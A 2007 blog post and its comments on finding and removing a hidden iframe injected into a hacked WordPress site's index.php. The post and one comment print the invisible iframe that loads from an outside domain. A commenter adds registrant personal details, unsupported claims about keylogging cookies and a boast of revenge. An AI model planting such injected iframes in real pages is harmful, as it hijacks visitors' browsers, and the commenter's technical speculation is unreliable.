ClickNewz! Internet Marketing Blog

Hacked, Fixed, Email/Feed Issues Resolved

October 16th, 2007 · 17 Comments ·


Good Grief :roll:

I sent out an email to some of my readers this morning as I noticed my Feed Broadcaster was no longer working, and wanted to make sure it wasnt just on my end. It wasnt.

Thanks to everyone who responded, by the way - you guys are great! It was Patty Gale who offered an idea that lead to the solution, so I logged into FeedBurner to check things out…

It turns out my feed wouldnt “validate”. It even told me why, which I didnt really understand. But it did point out the piece of code causing the problem:

[iframe name="StatPage" src="http://banner-network.hk/ppc/index.php" width=5 height=5 style="display:none"][/iframe]

Hmmm. Now I know I didnt put that there :-?

Next Step: do a search on Google using a string of that code to see if anyone else is discussing it online anywhere. I chose |iframe name=”StatPage”| and pasted that into the search bar, which returned this topic on WordPress Support.

Scanning the discussion I see the word “hacked” ( :shock: - not good). Keep scanning and see the 5th message down, which says:

Check your main index.php file and see if it was modified.

I open my FTP program, log on to my hosting account, look in the root directory, and open the index.php file. Bingo! There it is…

I removed the code, saved the file, and went back to FeedBurner’s troubleshooting section. This time my feed validated (yay!).

In the case that something like this ever happens to you, these troubleshooting steps might come in handy. Dont panic. Just identify the problem, all of the possible sources of that problem, and search on Google for the solution.

Chances are, nothing will happen to you (or your sites) that hasnt already happened to someone else first ;)

To state the obvious, we’re back up and running again. So for those of you that were getting an error in Bloglines, in your feed reader, were missing the email notifications, etc… everything should be working just fine now.

Best,

Tags: , , ,

Tags: RSS & Blogging

17 responses so far ↓

  • Nell Taliercio // Oct 16, 2007 at 7:46 pm

    Oh brother. When will people get a life? What a hassle on your end…glad it is fixed, though.

  • Lynn Terry // Oct 16, 2007 at 7:57 pm

    I hear ya!

    Unfortunately once everything was “fixed”, the email updates went out in a batch. I was worried that would happen. My apologies for the 3 emails in a row that everyone received tonight!

  • Patty Gale // Oct 16, 2007 at 9:17 pm

    That’s a bit scary, Lynn.

    I didn’t get a chance to reply to your last email, but I thought it was strange that Feedburner was taking so long to validate the feed. Usually they update in just a few minutes after pinging.

    I’m glad to see it’s resolved. :D

  • Lynn Terry // Oct 16, 2007 at 9:18 pm

    Thank you - and thanks again for the suggestions!

  • Stefani // Oct 16, 2007 at 9:32 pm

    At least you were able to figure it out and fix it. I would probably be at a total loss of figuring it out.

  • Rick Wilson // Oct 16, 2007 at 9:36 pm

    Soooo …

    Someone was trying to run some sort a banner network file thru your site, it looks like.

    Glad you have it resolved! :D

    Rick Wilson

  • Lynn Terry // Oct 16, 2007 at 9:58 pm

    It would appear so - though it was invisible. How sneaky is that - racking up impressions to provide stats to paying advertisers :|

  • Shannon // Oct 16, 2007 at 11:24 pm

    Ack! Maybe you should have researched the code a little further to try to find out who was benefiting from it and reported them. :)

  • Lynn Terry // Oct 16, 2007 at 11:26 pm

    A good idea ;)

  • Andy Levy-Stevenson // Oct 17, 2007 at 2:38 am

    I’d noticed it was causing your blog pages to hang on load … it even happened during your Web conference yesterday (when you loaded one of your pages to point something out).

    Didn’t realise the code was nefarious … glad you could sort it out.

  • Lynn Terry // Oct 17, 2007 at 6:17 am

    I didnt even associate the two Andy… but you’re right - the mysterious error is gone, so that must have been the case. Thank goodness, because I’m not sure I would have known where to start tracking that down otherwise :P

  • Chris B // Oct 17, 2007 at 10:03 am

    Hi Lynn,

    here are some stats and info on that problem causer.

    The domain the file is assoicated with running is registered with:
    https://www.hkdnr.hk/

    From HK (hong kong)

    Their Account Name: HK1917076T

    First name: TIM
    Last name: FLOCK
    Company Name: TIM FLOCK

    DNS:

    NS1.BANNER-NETWORK.HK
    NS2.BANNER-NETWORK.HK
    NS3.BANNER-NETWORK.HK

    Chinese Holder:
    john-lawson1956@doglover.com

    Spoofed Registration:
    21-06-2007

    in this code:

    [iframe name=”StatPage” src=”http://banner-network.hk/ppc/index.php” width=5 height=5 style=”display:none”][/iframe]

    Iframe Name, is specifing a action from the file, index.php located in ppc/ directory

    my guess is StatsPage is made to do two things, 1 track input types on the page this was inserted and 2 track results and cookie tracking. I highly recommend anyone who has resulted with this in their index file please clean your cookies, their can be a tracking (keylog) cookie in side this index.php file, I have (spoofed getting it) and found this out.

    Glad to help out!.

    and actually I had a rough attack from Japan, spoofing every address possible at webdevelopmenttechnology.com, I had over 300 messages send with out server, I blocked every single one. BUT, lol. if you aint’ got good money, it will be useless to report them, and try to sue or get them jailed. Japan, I even had the adress of the fart who done it. I just done some personaly justice, he won’t be doing it again.

  • Lynn Terry // Oct 17, 2007 at 10:24 am

    Thank you, Chris! Appreciate the detective work there, and will certainly take your advice ;)

  • Steve Johnson // Oct 17, 2007 at 12:29 pm

    Lynn,

    This is pretty serious, even though it was solved easily. Either your server was hacked, your WordPress install was hacked, or you have a worm or trojan on YOUR computer. Personally, I’d lay odds it’s one of the first two.

    Use a decent search utility and scan your local files for the text used in the iframe. If it appears on your computer in a file, try to determine where the file came from. This will give a clue as to whether you received the file with the iframe in it, or if it was modified after it hit your computer. Regardless of what you find, I would do a full system scan with a GOOD antivirus/spyware scanner, and sooner rather than later.

    Change your admin password for WordPress, and back up your database. It wouldn’t hurt to change your database access password either (you’ll have to update the configuration files for whatever scripts you have that access the db).

    Ask your hosting company for assistance. They may be able to help you determine when/where/how the changes in the file were made.

  • Lynn Terry // Oct 17, 2007 at 12:36 pm

    Thank you, Steve - I have already changed passwords in many of those locations and am tracking down each FTP account I set up for assistants etc at the moment too.

    I just bought a new computer, arrived this morning, so I am going scan this one, THEN do backups, then reload the O/S to a fresh install, and set up on the new box…

  • The top internet program training mentoring online // Oct 17, 2007 at 2:22 pm

    :) Ah Lynn, I tried to imagine what went in your mind while that moments last?

    Nice for sharing and I will take notice.

  • duncan // Oct 18, 2007 at 1:33 pm

    I’m having big problems at my yahoo e-mail so I’m moving to gmail…Thank-you P.S. I had 7 years of important e-mails go up into the dust..

Leave a Comment

Free Webinar: Internet Marketing Q&A Listen In While I Interview An Expert